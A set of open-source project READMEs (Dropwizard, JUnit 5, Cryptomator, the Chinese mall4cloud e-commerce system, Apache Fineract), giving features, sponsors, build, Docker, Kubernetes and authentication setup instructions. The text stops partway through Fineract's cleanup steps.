please read the following [CONTRIBUTING](CONTRIBUTING.md) document. Need help or found an issue? --- When reporting an issue through the [issue tracker](https://github.com/dropwizard/dropwizard/issues?state=open) on GitHub or sending an email to the [Dropwizard User Google Group](https://groups.google.com/forum/#!forum/dropwizard-user) mailing list, please use the following guidelines: * Check existing issues to see if it has been addressed already * The version of Dropwizard you are using * A short description of the issue you are experiencing and the expected outcome * Description of how someone else can reproduce the problem * Paste error output or logs in your issue or in a Gist. If pasting them in the GitHub issue, wrap it in three backticks: ``` so that it renders nicely * Write a unit test to show the issue! Sponsors -------- Dropwizard is generously supported by some companies with licenses and free accounts for their products. ### JetBrains ![JetBrains](docs/source/about/jetbrains.png) [JetBrains](https://www.jetbrains.com/) supports our open source project by sponsoring some [All Products Packs](https://www.jetbrains.com/products.html) within their [Free Open Source License](https://www.jetbrains.com/buy/opensource/) program.
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✅ The 5th major version of the programmer-friendly testing framework for Java and the JVM
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# <img src="https://junit.org/junit5/assets/img/junit5-logo.png" align="right" width="100">JUnit 5 This repository is the home of _JUnit 5_. ## Sponsors [![Support JUnit](https://img.shields.io/badge/%F0%9F%92%9A-Support%20JUnit-brightgreen.svg)](https://junit.org/sponsoring) * **Gold Sponsors:** [JetBrains](https://jb.gg/junit-logo) * **Silver Sponsors:** [Micromata](https://www.micromata.de), [Quo Card](https://quo-digital.jp) * **Bronze Sponsors:** [Premium Minds](https://www.premium-minds.com), [Testmo](https://www.testmo.com), [codefortynine](https://codefortynine.com), [Info Support](https://www.infosupport.com), [Stiltsoft](https://stiltsoft.com), [Code Intelligence](https://www.code-intelligence.com) ## Latest Releases - General Availability (GA): [JUnit 5.10.2](https://github.com/junit-team/junit5/releases/tag/r5.10.2) (February 4, 2024) - Preview (Milestone/Release Candidate): N/A ## Documentation - [User Guide] - [Javadoc] - [Release Notes] - [Samples] ## Contributing Contributions to JUnit 5 are both welcomed and appreciated. For specific guidelines regarding contributions, please see [CONTRIBUTING.md] in the root directory of the project. Those willing to use milestone or SNAPSHOT releases are encouraged to file feature requests and bug reports using the project's [issue tracker](https://github.com/junit-team/junit5/issues). Issues marked with an <a href="https://github.com/junit-team/junit5/issues?q=is%3Aissue+is%3Aopen+label%3Aup-for-grabs">`up-for-grabs`</a> label are specifically targeted for community contributions. ## Getting Help Ask JUnit 5 related questions on [StackOverflow] or chat with the community on [Gitter]. ## Continuous Integration Builds [![CI Status](https://github.com/junit-team/junit5/workflows/CI/badge.svg)](https://github.com/junit-team/junit5/actions) [![Cross-Version Status](https://github.com/junit-team/junit5/workflows/Cross-Version/badge.svg)](https://github.com/junit-team/junit5/actions) Official CI build server for JUnit 5. Used to perform quick checks on submitted pull requests and for build matrices including the latest released OpenJDK and early access builds of the next OpenJDK. ## Code Coverage Code coverage using [JaCoCo] for the latest build is available on [Codecov]. A code coverage report can also be generated locally via the [Gradle Wrapper] by executing `./gradlew -Ptesting.enableJaCoCo clean jacocoRootReport`. The results will be available in `build/reports/jacoco/jacocoRootReport/html/index.html`. ## Develocity [![Revved up by Develocity](https://img.shields.io/badge/Revved%20up%20by-Develocity-06A0CE?logo=Gradle&labelColor=02303A)](https://ge.junit.org/scans) JUnit 5 utilizes [Develocity](https://gradle.com/) for [Build Scans](https://scans.gradle.com/), [Build Cache](https://docs.gradle.org/current/userguide/build_cache.html), and [Predictive Test Selection](https://docs.gradle.com/enterprise/predictive-test-selection/). The latest Build Scans are available on [ge.junit.org](https://ge.junit.org/). Currently, only core team members can publish Build Scans on that server. You can, however, publish a Build Scan to [scans.gradle.com](https://scans.gradle.com/) by using the `--scan` parameter explicitly. The remote Build Cache is enabled by default for everyone so that local builds can reuse task outputs from previous CI builds. ## Building from Source You need [JDK 21] to build JUnit 5. [Gradle toolchains] are used to detect and potentially download additional JDKs for compilation and test execution. All modules can be _built_ and _tested_ with the [Gradle Wrapper] using the following command. `./gradlew build` ## Installing in Local Maven Repository All modules can be _installed_ with the [Gradle Wrapper] in a local Maven repository for consumption in other projects via the following command. `./gradlew publishToMavenLocal` ## Dependency Metadata [![JUnit Jupiter version](https://img.shields.io/maven-central/v/org.junit.jupiter/junit-jupiter/5..svg?color=25a162&label=Jupiter)](https://central.sonatype.com/search?namespace=org.junit.jupiter) [![JUnit Vintage version](https://img.shields.io/maven-central/v/org.junit.vintage/junit-vintage-engine/5..svg?color=25a162&label=Vintage)](https://central.sonatype.com/search?namespace=org.junit.vintage) [![JUnit Platform version](https://img.shields.io/maven-central/v/org.junit.platform/junit-platform-commons/1..svg?color=25a162&label=Platform)](https://central.sonatype.com/search?namespace=org.junit.platform) Consult the [Dependency Metadata] section of the [User Guide] for a list of all artifacts of the JUnit Platform, JUnit Jupiter, and JUnit Vintage. See also <https://repo1.maven.org/maven2/org/junit/> for releases and <https://oss.sonatype.org/content/repositories/snapshots/org/junit/> for snapshots. [Codecov]: https://codecov.io/gh/junit-team/junit5 [CONTRIBUTING.md]: https://github.com/junit-team/junit5/blob/HEAD/CONTRIBUTING.md [Dependency Metadata]: https://junit.org/junit5/docs/current/user-guide/#dependency-metadata [Gitter]: https://gitter.im/junit-team/junit5 [Gradle toolchains]: https://docs.gradle.org/current/userguide/toolchains.html [Gradle Wrapper]: https://docs.gradle.org/current/userguide/gradle_wrapper.html#sec:using_wrapper [JaCoCo]: https://www.eclemma.org/jacoco/ [Javadoc]: https://junit.org/junit5/docs/current/api/ [JDK 21]: https://javaalmanac.io/jdk/21/ [Release Notes]: https://junit.org/junit5/docs/current/release-notes/ [Samples]: https://github.com/junit-team/junit5-samples [StackOverflow]: https://stackoverflow.com/questions/tagged/junit5 [User Guide]: https://junit.org/junit5/docs/current/user-guide/
Multi-platform transparent client-side encryption of your files in the cloud
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[![cryptomator](cryptomator.png)](https://cryptomator.org/) [![Build](https://github.com/cryptomator/cryptomator/workflows/Build/badge.svg)](https://github.com/cryptomator/cryptomator/actions?query=workflow%3ABuild) [![Known Vulnerabilities](https://snyk.io/test/github/cryptomator/cryptomator/badge.svg)](https://snyk.io/test/github/cryptomator/cryptomator) [![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=cryptomator_cryptomator&metric=alert_status)](https://sonarcloud.io/dashboard?id=cryptomator_cryptomator) [![Twitter](https://img.shields.io/badge/twitter-@Cryptomator-blue.svg?style=flat)](http://twitter.com/Cryptomator) [![Crowdin](https://badges.crowdin.net/cryptomator/localized.svg)](https://translate.cryptomator.org/) [![Latest Release](https://img.shields.io/github/release/cryptomator/cryptomator.svg)](https://github.com/cryptomator/cryptomator/releases/latest) [![Community](https://img.shields.io/badge/help-Community-orange.svg)](https://community.cryptomator.org) ## Supporting Cryptomator Cryptomator is provided free of charge as an open-source project despite the high development effort and is therefore dependent on donations. If you are also interested in further development, we offer you the opportunity to support us: - [One-time or recurring donation via Cryptomator's website.](https://cryptomator.org/#donate) - [Become a sponsor via Cryptomator's sponsors website.](https://cryptomator.org/sponsors/) ### Gold Sponsors <table> <tbody> <tr> <td><a href="https://www.gee-whiz.de/"><img src="https://cryptomator.org/img/sponsors/geewhiz.svg" alt="gee-whiz" height="80"></a></td> </tr> </tbody> </table> ### Silver Sponsors <table> <tbody> <tr> <td><a href="https://mowcapital.com/"><img src="https://cryptomator.org/img/sponsors/mowcapital.svg" alt="Mow Capital" height="28"></a></td> <td><a href="https://www.easeus.com/"><img src="https://cryptomator.org/img/sponsors/easeus.png" alt="EaseUS" height="40"></a></td> <td><a href="https://www.hassmann-it-forensik.de/"><img src="https://cryptomator.org/img/sponsors/hassmannitforensik.png" alt="Hassmann IT-Forensik" height="40"></a></td> </tr> </tbody> </table> ### Special Shoutout Continuous integration hosting for ARM64 builds is provided by [MacStadium](https://www.macstadium.com/opensource). <a href="https://www.macstadium.com/opensource"><img src="https://uploads-ssl.webflow.com/5ac3c046c82724970fc60918/5c019d917bba312af7553b49_MacStadium-developerlogo.png" alt="MacStadium" height="100"></a> --- ## Introduction Cryptomator offers multi-platform transparent client-side encryption of your files in the cloud. Download native binaries of Cryptomator on [cryptomator.org](https://cryptomator.org/) or clone and build Cryptomator using Maven (instructions below). ## Features - Works with Dropbox, Google Drive, OneDrive, MEGA, pCloud, ownCloud, Nextcloud and any other cloud storage service which synchronizes with a local directory - Open Source means: No backdoors, control is better than trust - Client-side: No accounts, no data shared with any online service - Totally transparent: Just work on the virtual drive as if it were a USB flash drive - AES encryption with 256-bit key length - File names get encrypted - Folder structure gets obfuscated - Use as many vaults in your Dropbox as you want, each having individual passwords - Four thousand commits for the security of your data!! :tada: ### Privacy - 256-bit keys (unlimited strength policy bundled with native binaries) - Scrypt key derivation - Cryptographically secure random numbers for salts, IVs and the masterkey of course - Sensitive data is wiped from the heap asap - Lightweight: [Complexity kills security](https://www.schneier.com/essays/archives/1999/11/a_plea_for_simplicit.html) ### Consistency - Authenticated encryption is used for file content to recognize changed ciphertext before decryption - I/O operations are transactional and atomic, if the filesystems support it - Each file contains all information needed for decryption (except for the key of course), no common metadata means no [SPOF](http://en.wikipedia.org/wiki/Single_point_of_failure) ### Security Architecture For more information on the security details visit [cryptomator.org](https://docs.cryptomator.org/en/latest/security/architecture/). ## Building ### Dependencies * JDK 21 (e.g. temurin, zulu) * Maven 3 ### Run Maven ``` mvn clean install # or mvn clean install -Pwin # or mvn clean install -Pmac # or mvn clean install -Plinux ``` This will build all the jars and bundle them together with their OS-specific dependencies under `target`. This can now be used to build native packages. ## License This project is dual-licensed under the GPLv3 for FOSS projects as well as a commercial license for independent software vendors and resellers. If you want to modify this application under different conditions, feel free to contact our support team.
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![输入图片说明](doc/img/readme/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20211203094919.png) 一个基于Spring Cloud、Nacos、Seata、Mysql、Redis、RocketMQ、canal、ElasticSearch、minio的微服务B2B2C电商商城系统,采用主流的互联网技术架构、全新的UI设计、支持集群部署、服务注册和发现以及拥有完整的订单流程等,代码完全开源,没有任何二次封装,是一个非常适合二次开发的电商平台系统。 ## Spring以及VUE官方宣布,SpringBoot2与Vue2已在2023年底停止维护。新项目建议使用SpringBoot3+Vue3的组合,本商城已完成升级!!! ## 前言 本商城致力于为中大型企业打造一个功能完整、易于维护的微服务B2B2C电商商城系统,采用主流微服务技术实现。后台管理系统包含平台管理,店铺管理、商品管理、订单管理、规格管理、权限管理、资源管理等模块。 ## 文档 这代码有没有文档呀? 当然有啦,你已经下载了,在doc这个文件夹上,实在不知道,我就给链接出来咯: gitee:https://gitee.com/gz-yami/mall4cloud/tree/master/doc **开发环境搭建视频(推荐先看下文档再看视频):https://www.bilibili.com/video/BV1TK411C7aV** 有声音了。如果视频对你有用,记得点赞投币噢。 本项目是一个极度遵守阿里巴巴代码规约的项目,以下是代码规约扫描结果 ![阿里代码规约扫描结果](doc/img/readme/阿里代码规约扫描结果.png) 具体目录结构和代码规范,可以查看 https://gitee.com/gz-yami/mall4cloud/tree/master/doc/%E4%BB%A3%E7%A0%81%E7%9B%AE%E5%BD%95%E7%BB%93%E6%9E%84 ## 授权 除开源版本外,本商城还提供商业版本的商城,欲知详情,请访问官网。 商城官网:https://www.mall4j.com 商城使用 AGPLv3 开源,请遵守 AGPLv3 的相关条款,或者联系作者获取商业授权(https://www.mall4j.com) ## 项目链接 JAVA后台:https://gitee.com/gz-yami/mall4cloud 平台端:https://gitee.com/gz-yami/mall4cloud-platform 商家端:https://gitee.com/gz-yami/mall4cloud-multishop uni-app:https://gitee.com/gz-yami/mall4cloud-uniapp ## 演示地址 商业版演示地址: pc端:https://cloud-pc.mall4j.com H5端:https://h5.mall4j.com/cloud 商业版小程序演示 ![输入图片说明](doc/img/readme/%E7%99%BD%E6%B4%9E%E7%89%88%E5%B0%8F%E7%A8%8B%E5%BA%8F.png) ## 目录结构规范 我们也有自己的目录结构 ![img](./doc/img/%E7%9B%AE%E5%BD%95%E7%BB%93%E6%9E%84%E5%92%8C%E8%A7%84%E8%8C%83/%E5%BA%94%E7%94%A8%E5%88%86%E5%B1%82.png) - VO(View Object):显示层对象,通常是 Web 向模板渲染引擎层传输的对象。 - DTO(Data Transfer Object):数据传输对象,前端像后台进行传输的对象,类似于param。 - BO(Business Object):业务对象,内部业务对象,只在内部传递,不对外进行传递。 - Model:模型层,此对象与数据库表结构一一对应,通过 Mapper 层向上传输数据源对象。 - Controller:主要是对外部访问控制进行转发,各类基本参数校验,或者不复用的业务简单处理等。为了简单起见,一些与事务无关的代码也在这里编写。 - FeignClient:由于微服务之间存在互相调用,这里是内部请求的接口。 - Controller:主要是对内部访问控制进行转发,各类基本参数校验,或者不复用的业务简单处理等。为了简单起见,一些与事务无关的代码也在这里编写。 - Service 层:相对具体的业务逻辑服务层。 - Manager 层:通用业务处理层,它有如下特征: - 1) 对第三方平台封装的层,预处理返回结果及转化异常信息,适配上层接口。 - 2) 对 Service 层通用能力的下沉,如缓存方案、中间件通用处理。 - 3) 与 DAO 层交互,对多个 DAO 的组合复用。 - Mapper持久层:数据访问层,与底层 MySQL进行数据交互。 - Listener:监听 `RocketMQ` 进行处理,有时候会监听`easyexcel`相关数据。 关于`FeignClient`,由于微服务之间存在互相调用,`Feign` 是http协议,理论上是为了解耦,而实际上提供方接口进行修改,调用方却没有进行修改的时候,会造成异常,所以我们抽取出来。还有就是对内暴露的接口,是很多地方都公用的,所以我们还将接口抽取了出了一个模块,方便引用。可以看到`mall4cloud-api`这个模块下是所有对内`feign`接口的信息。 ## 目录结构 ``` mall4cloud ├─mall4cloud-api -- 内网接口 │ ├─mall4cloud-api-auth -- 授权对内接口 │ ├─mall4cloud-api-biz -- biz对内接口 │ ├─mall4cloud-api-leaf -- 美团分布式id生成接口 │ ├─mall4cloud-api-multishop -- 店铺对内接口 │ ├─mall4cloud-api-order -- 订单对内接口 │ ├─mall4cloud-api-platform -- 平台对内接口 │ ├─mall4cloud-api-product -- 商品对内接口 │ ├─mall4cloud-api-rbac -- 用户角色权限对内接口 │ ├─mall4cloud-api-search -- 搜索对内接口 │ └─mall4cloud-api-user -- 用户对内接口 ├─mall4cloud-auth -- 授权校验模块 ├─mall4cloud-biz -- mall4cloud 业务代码。如图片上传/短信等 ├─mall4cloud-common -- 一些公共的方法 │ ├─mall4cloud-common-cache -- 缓存相关公共代码 │ ├─mall4cloud-common-core -- 公共模块核心(公共中的公共代码) │ ├─mall4cloud-common-database -- 数据库连接相关公共代码 │ ├─mall4cloud-common-order -- 订单相关公共代码 │ ├─mall4cloud-common-product -- 商品相关公共代码 │ ├─mall4cloud-common-rocketmq -- rocketmq相关公共代码 │ └─mall4cloud-common-security -- 安全相关公共代码 ├─mall4cloud-gateway -- 网关 ├─mall4cloud-leaf -- 基于美团leaf的生成id服务 ├─mall4cloud-multishop -- 商家端 ├─mall4cloud-order -- 订单服务 ├─mall4cloud-payment -- 支付服务 ├─mall4cloud-platform -- 平台端 ├─mall4cloud-product -- 商品服务 ├─mall4cloud-rbac -- 用户角色权限模块 ├─mall4cloud-search -- 搜索模块 └─mall4cloud-user -- 用户服务 ``` ## 技术选型 ![技术框架](doc/img/readme/技术框架.png) ## 系统架构图 ![架构图](doc/img/readme/架构图.png) ## 商城部署后 API 地址 | 服务 | 地址 | | ---------------------------------------------------- |-----------------------| | mall4cloud-gatway 网关服务 | | | mall4cloud-auth 授权校验服务 | | | mall4cloud-biz 业务代码服务(如图片上传/短信等) | | | mall4cloud-leaf 基于美团leaf的生成id服务 | | | mall4cloud-multishop 商家服务 | | | mall4cloud-order 订单服务 | | | mall4cloud-payment 支付服务 | | | mall4cloud-product 商品服务 | | | mall4cloud-rbac 用户角色服务 | | | mall4cloud-search 搜索服务 | | | mall4cloud-user 用户服务 | | ## 部署教程 部署教程请参考该文件夹下的`/基本开发文档/mall4cloud开发环境搭建.md`以及`/开发环境搭建`目录下的中间件安装。 ## 代码运行相关截图 ### 1.后台截图 - 平台端 ![](doc/img/readme/image-20231130110607548.png) - 商家端 ![image-20210705151729559](doc/img/readme/image-20231130112350296.png) ![image-20210705151847270](doc/img/readme/image-20231130112429089.png) ### 2.小程序截图 ![小程序-1625472143277](doc/img/readme/小程序.png) ### 3.uni-app截图 ![uniapp-1625469707350](doc/img/readme/uniapp.png) ## 提交反馈 - Mall4j官网 https://www.mall4j.com - mall4cloud开源技术QQ群:561496886 - 如需购买商业版源码,请联系商务微信 ![输入图片说明](https://19838323.s21i.faiusr.com/4/4/ABUIABAEGAAgksmNlAYojomK2gIwrAI4rAI!160x160.png) ## springboot版本商城请点击 https://gitee.com/gz-yami/mall4j ## 你的点赞鼓励,是我们前进的动力~ ## 你的点赞鼓励,是我们前进的动力~ ## 你的点赞鼓励,是我们前进的动力~ ## 更多信息请查看官网 https://www.mall4j.com
Apache Fineract
Apache Fineract: A Platform for Microfinance ============ [![Swagger Validation](https://validator.swagger.io/validator?url=https://sandbox.mifos.community/fineract-provider/swagger-ui/fineract.yaml)](https://validator.swagger.io/validator/debug?url=https://sandbox.mifos.community/fineract-provider/swagger-ui/fineract.yaml) [![build](https://github.com/apache/fineract/actions/workflows/build.yml/badge.svg)](https://github.com/apache/fineract/actions/workflows/build.yml) [![Docker Hub](https://img.shields.io/docker/pulls/apache/fineract.svg?logo=Docker)](https://hub.docker.com/r/apache/fineract) [![Docker Build](https://img.shields.io/docker/cloud/build/apache/fineract.svg?logo=Docker)](https://hub.docker.com/r/apache/fineract/builds) [![Technical Debt](https://sonarcloud.io/api/project_badges/measure?project=apache_fineract&metric=sqale_index)](https://sonarcloud.io/summary/new_code?id=apache_fineract) </b> Fineract is a mature platform with open APIs that provides a reliable, robust, and affordable core banking solution for financial institutions offering services to the world’s 3 billion underbanked and unbanked. [Have a look at the FAQ on our Wiki at apache.org](https://cwiki.apache.org/confluence/display/FINERACT/FAQ) if this README does not answer what you are looking for. [Visit our JIRA Dashboard](https://issues.apache.org/jira/secure/Dashboard.jspa?selectPageId=12335824) to find issues to work on, see what others are working on, or open new issues. [![Code Now! (Gitpod)](https://gitpod.io/button/open-in-gitpod.svg)](https://gitpod.io/#https://github.com/apache/fineract) to start contributing to this project in the online web-based IDE GitPod.io right away! (You may initially have to press F1 to Find Command and run "Java: Start Language Server".) It's of course also possible to contribute with a "traditional" local development environment (see below). COMMUNITY ========= If you are interested in contributing to this project, but perhaps don't quite know how and where to get started, please [join our developer mailing list](http://fineract.apache.org/#contribute), listen into our conversations, chime into threads, and just send us a "Hello!" introduction email; we're a friendly bunch, and look forward to hearing from you. REQUIREMENTS ============ * `Java >= 17` (Azul Zulu JVM is tested by our CI on GitHub Actions) * MariaDB `11.2` You can run the required version of the database server in a container, instead of having to install it, like this: docker run --name mariadb-11.2 -p 3306:3306 -e MARIADB_ROOT_PASSWORD=mysql -d mariadb:11.2 and stop and destroy it like this: docker rm -f mariadb-11.2 <br>Beware that this database container database keeps its state inside the container and not on the host filesystem. It is lost when you destroy (rm) this container. This is typically fine for development. See [Caveats: Where to Store Data on the database container documentation](https://hub.docker.com/_/mariadb) re. how to make it persistent instead of ephemeral.<br> Tomcat v9 is only required if you wish to deploy the Fineract WAR to a separate external servlet container. Note that you do not require to install Tomcat to develop Fineract, or to run it in production if you use the self-contained JAR, which transparently embeds a servlet container using Spring Boot. (Until FINERACT-730, Tomcat 7/8 were also supported, but now Tomcat 9 is required.) <br>IMPORTANT: If you use MySQL or MariaDB ============ Recently (after release `1.7.0`), we introduced improved date time handling in Fineract. Date time is from now on stored in UTC and we are enforcing UTC timezone even on the JDBC driver, e. g. for MySQL: ``` serverTimezone=UTC&useLegacyDatetimeCode=false&sessionVariables=time_zone=‘-00:00’ ``` __DO__: If you do use MySQL as your Fineract database then the following configuration is highly recommended: * Run the application in UTC (the default command line in our Docker image has the necessary parameters already set) * Run the MySQL database server in UTC (if you use managed services like AWS RDS then this should be the default anyway, but it would be good to double-check) __DON'T__: In case the Fineract instance and the MySQL server are __not__ running in UTC then the following could happen: * MySQL is saving date time values differently from PostgreSQL * Example scenario: if the Fineract instance runs in timezone: GMT+2, and the local date time is 2022-08-11 17:15 ... * ... then __PostgreSQL saves__ the LocalDateTime as is: __2022-08-11 17:15__ * ... and __MySQL saves__ the LocalDateTime in UTC: __2022-08-11 15:15__ * ... but when we __read__ the date time from PostgreSQL __or__ from MySQL, then both systems give us the same values: __2022-08-11 17:15 GMT+2__ If a previously used Fineract instance didn't run in UTC (backward compatibility), then all prior dates will be read wrongly by MySQL/MariaDB. This can cause issues when you run the database migration scripts. __RECOMMENDATION__: you need to shift all dates in your database by the timezone offset that your Fineract instance used. <br>INSTRUCTIONS: How to run for local development ============ Run the following commands: 1. `./gradlew createDB -PdbName=fineract_tenants` 1. `./gradlew createDB -PdbName=fineract_default` 1. `./gradlew bootRun` <br>INSTRUCTIONS: How to build the JAR file ============ 1. Clone the repository or download and extract the archive file to your local directory. 2. Run `./gradlew clean bootJar` to build a modern cloud native fully self contained JAR file which will be created at `fineract-provider/build/libs` directory. 3. As we are not allowed to include a JDBC driver in the built JAR, download a JDBC driver of your choice. For example: `wget https://downloads.mariadb.com/Connectors/java/connector-java-3.3.2/mariadb-java-client-3.3.2.jar` 4. Start the jar and pass the directory where you have downloaded the JDBC driver as loader.path, for example: `java -Dloader.path=. -jar fineract-provider/build/libs/fineract-provider.jar` (does not require external Tomcat) NOTE: we cannot upgrade to version 3.0.x of the MariaDB driver just yet; have to wait until 3.0.4 is out for a bug fix. The tenants database connection details are configured [via environment variables (as with Docker container)](#instructions-to-run-using-docker-and-docker-compose), e.g. like this: export FINERACT_HIKARI_PASSWORD=verysecret ... java -jar fineract-provider.jar <br>SECURITY ============ NOTE: The HTTP Basic and OAuth2 authentication schemes are mutually exclusive. You can't enable them both at the same time. Fineract checks these settings on startup and will fail if more than one authentication scheme is enabled. HTTP Basic Authentication ------------ By default Fineract is configured with a HTTP Basic Authentication scheme, so you actually don't have to do anything if you want to use it. But if you would like to explicitly choose this authentication scheme then there are two ways to enable it: 1. Use environment variables (best choice if you run with Docker Compose): ``` FINERACT_SECURITY_BASICAUTH_ENABLED=true FINERACT_SECURITY_OAUTH_ENABLED=false ``` 2. Use JVM parameters (best choice if you run the Spring Boot JAR): ``` java -Dfineract.security.basicauth.enabled=true -Dfineract.security.oauth.enabled=false -jar fineract-provider.jar ``` <br>OAuth2 AUTHENTICATION ------------ There is also an OAuth2 authentication scheme available. Again, two ways to enable it: 1. Use environment variables (best choice if you run with Docker Compose): ``` FINERACT_SECURITY_BASICAUTH_ENABLED=false FINERACT_SECURITY_OAUTH_ENABLED=true ``` 2. Use JVM parameters (best choice if you run the Spring Boot JAR): ``` java -Dfineract.security.basicauth.enabled=false -Dfineract.security.oauth.enabled=true -jar fineract-provider.jar ``` TWO FACTOR AUTHENTICATION (2FA) ------------ You can also enable 2FA authentication. Depending on how you start Fineract add the following: 1. Use environment variable (best choice if you run with Docker Compose): ``` FINERACT_SECURITY_2FA_ENABLED=true ``` 2. Use JVM parameter (best choice if you run the Spring Boot JAR): ``` -Dfineract.security.2fa.enabled=true ``` <br>INSTRUCTIONS: How to build a WAR file ============ 1. Clone the repository or download and extract the archive file to your local directory. 2. Run `./gradlew :fineract-war:clean :fineract-war:war` to build a traditional WAR file which will be created at `fineract-war/build/libs` directory. 3. Deploy this WAR to your Tomcat v9 Servlet Container. We recommend using the JAR instead of the WAR file deployment, because it's much easier. Note that with the 1.4 release the tenants database pool configuration changed from Tomcat DBCP in XML to an embedded Hikari, configured by environment variables, see above. INSTRUCTIONS: How to execute Integration Tests ============ > Note that if this is the first time to access MySQL DB, then you may need to reset your password. Run the following commands: 1. `./gradlew createDB -PdbName=fineract_tenants` 1. `./gradlew createDB -PdbName=fineract_default` 1. `./gradlew clean test` INSTRUCTIONS: How to run and debug in Eclipse IDE ============ It is possible to run Fineract in Eclipse IDE and also to debug Fineract using Eclipse's debugging facilities. To do this, you need to create the Eclipse project files and import the project into an Eclipse workspace: 1. Create Eclipse project files into the Fineract project by running `./gradlew cleanEclipse eclipse` 2. Import the fineract-provider project into your Eclipse workspace (File->Import->General->Existing Projects into Workspace, choose root directory fineract/fineract-provider) 3. Do a clean build of the project in Eclipse (Project->Clean...) 3. Run / debug Fineract by right clicking on org.apache.fineract.ServerApplication class and choosing Run As / Debug As -> Java Application. All normal Eclipse debugging features (breakpoints, watchpoints etc) should work as expected. If you change the project settings (dependencies etc) in Gradle, you should redo step 1 and refresh the project in Eclipse. You can also use Eclipse Junit support to run tests in Eclipse (Run As->Junit Test) Finally, modifying source code in Eclipse automatically triggers hot code replace to a running instance, allowing you to immediately test your changes INSTRUCTIONS: How to run using Docker and docker-compose =================================================== It is possible to do a 'one-touch' installation of Fineract using containers (AKA "Docker"). Fineract now packs the mifos community-app web UI in it's docker deploy. You can now run and test fineract with a GUI directly from the combined docker builds. This includes the database running in a container. As Prerequisites, you must have `docker` and `docker-compose` installed on your machine; see [Docker Install](https://docs.docker.com/install/) and [Docker Compose Install](https://docs.docker.com/compose/install/). Alternatively, you can also use [Podman](https://github.com/containers/libpod) (e.g. via `dnf install podman-docker`), and [Podman Compose](https://github.com/containers/podman-compose/) (e.g. via `pip3 install podman-compose`) instead of Docker. Now to run a new Fineract instance you can simply: 1. `git clone https://github.com/apache/fineract.git ; cd fineract` 1. for windows, use `git clone https://github.com/apache/fineract.git --config core.autocrlf=input ; cd fineract` 1. `./gradlew :fineract-provider:jibDockerBuild -x test` 1. install the Loki log driver with `docker plugin install grafana/loki-docker-driver:latest --alias loki --grant-all-permissions` 1. `docker compose -f docker-compose-development.yml up -d` 1. fineract (back-end) is running at https://localhost:8443/fineract-provider/ 1. wait for https://localhost:8443/fineract-provider/actuator/health to return `{"status":"UP"}` 1. you must go to https://localhost:8443 and remember to accept the self-signed SSL certificate of the API once in your browser, otherwise you get a message that is rather misleading from the UI. 1. community-app (UI) is running at http://localhost:9090/?baseApiUrl=https://localhost:8443/fineract-provider&tenantIdentifier=default 1. login using default _username_ `mifos` and _password_ `password` https://hub.docker.com/r/apache/fineract has a pre-built container image of this project, built continuously. You must specify the MySQL tenants database JDBC URL by passing it to the `fineract` container via environment variables; please consult the [`docker-compose.yml`](docker-compose.yml) for exact details how to specify those. _(Note that in previous versions, the `mysqlserver` environment variable used at `docker build` time instead of at `docker run` time did something similar; this has changed in [FINERACT-773](https://issues.apache.org/jira/browse/FINERACT-773)), and the `mysqlserver` environment variable is now no longer supported.)_ The logfiles and the Java Flight Recorder output are available in `PROJECT_ROOT/build/fineract/logs`. If you use IntelliJ then you can double-click on the `.jfr` file and open it with the IDE. You can also download Azul Mission Control from here https://www.azul.com/products/components/azul-mission-control/ to analyze the Java Flight Recorder file. NOTE: If you have issues with the file permissions and Docker Compose then you might need to change the variable values for `FINERACT_USER` and `FINERACT_GROUP` in `PROJECT_ROOT/config/docker/env/fineract-common.env`. You can find out what values you need to put there with the following commands: ``` id -u ${USER} id -u ${GROUP} ``` Please make sure that you are not checking in your changed values. The defaults should normally work for most people. Connection pool configuration ============================= Please check `application.properties` to see which connection pool settings can be tweaked. The associated environment variables are prefixed with `FINERACT_HIKARI_*`. You can find more information about specific connection pool settings (Hikari) at https://github.com/brettwooldridge/HikariCP#configuration-knobs-baby NOTE: we'll keep backwards compatibility until one of the next releases to ensure that things are working as expected. Environment variables prefixed `fineract_tenants_*` can still be used to configure the database connection, but we strongly encourage using `FINERACT_HIKARI_*` with more options. <br>SSL CONFIGURATION ================= Read also [the HTTPS related doc](fineract-doc/src/docs/en/deployment.adoc#https). By default SSL is enabled, but all SSL related properties are now tunable. SSL can be turned off by setting the environment variable `FINERACT_SERVER_SSL_ENABLED` to false. If you do that then please make sure to also change the server port to `8080` via the variable `FINERACT_SERVER_PORT`, just for the sake of keeping the conventions. You can choose now easily a different SSL keystore by setting `FINERACT_SERVER_SSL_KEY_STORE` with a path to a different (not embedded) keystore. The password can be set via `FINERACT_SERVER_SSL_KEY_STORE_PASSWORD`. See the `application.properties` file and the latest Spring Boot documentation (https://docs.spring.io/spring-boot/docs/current/reference/html/application-properties.html) for more details. <br>TOMCAT CONFIGURATION ==================== Please refer to the `application.properties` and the official Spring Boot documentation (https://docs.spring.io/spring-boot/docs/current/reference/html/application-properties.html) on how to do performance tuning for Tomcat. Note: you can set now the acceptable form POST size (default is 2MB) via environment variable `FINERACT_SERVER_TOMCAT_MAX_HTTP_FORM_POST_SIZE`. <br>INSTRUCTIONS: How to run on Kubernetes ================================= <br>General Clusters ---------------- You can also run Fineract using containers on a Kubernetes cluster. Make sure you set up and connect to your Kubernetes cluster. You can follow [this](https://cwiki.apache.org/confluence/display/FINERACT/Install+and+configure+kubectl+and+Google+Cloud+SDK+on+ubuntu+16.04) guide to set up a Kubernetes cluster on GKE. Make sure to replace `apache-fineract-cn` with `apache-fineract` Now e.g. from your Google Cloud shell, run the following commands: 1. `git clone https://github.com/apache/fineract.git ; cd fineract/kubernetes` 1. `./kubectl-startup.sh` To shutdown and reset your Cluster, run: ./kubectl-shutdown.sh Using Minikube -------------- Alternatively, you can run fineract on a local kubernetes cluster using [minikube](https://minikube.sigs.k8s.io/docs/). As Prerequisites, you must have `minikube` and `kubectl` installed on your machine; see [Minikube & Kubectl install](https://kubernetes.io/docs/tasks/tools/install-minikube/). Now to run a new Fineract instance on Minikube you can simply: 1. `git clone https://github.com/apache/fineract.git ; cd fineract/kubernetes` 1. `minikube start` 1. `./kubectl-startup.sh` 1. `minikube service fineract-server --url --https` 1. Fineract is now running at the printed URL (note HTTP), which you can check e.g. using: http --verify=no --timeout 240 --check-status get $(minikube service fineract-server --url --https)/fineract-provider/actuator/health To check the status of your containers on your local minikube Kubernetes cluster, run: minikube dashboard You can check Fineract logs using: kubectl logs deployment/fineract-server To shutdown and reset your cluster, run: ./kubectl-shutdown.sh To shutdown and reset your cluster, run: minikube ssh sudo rm -rf 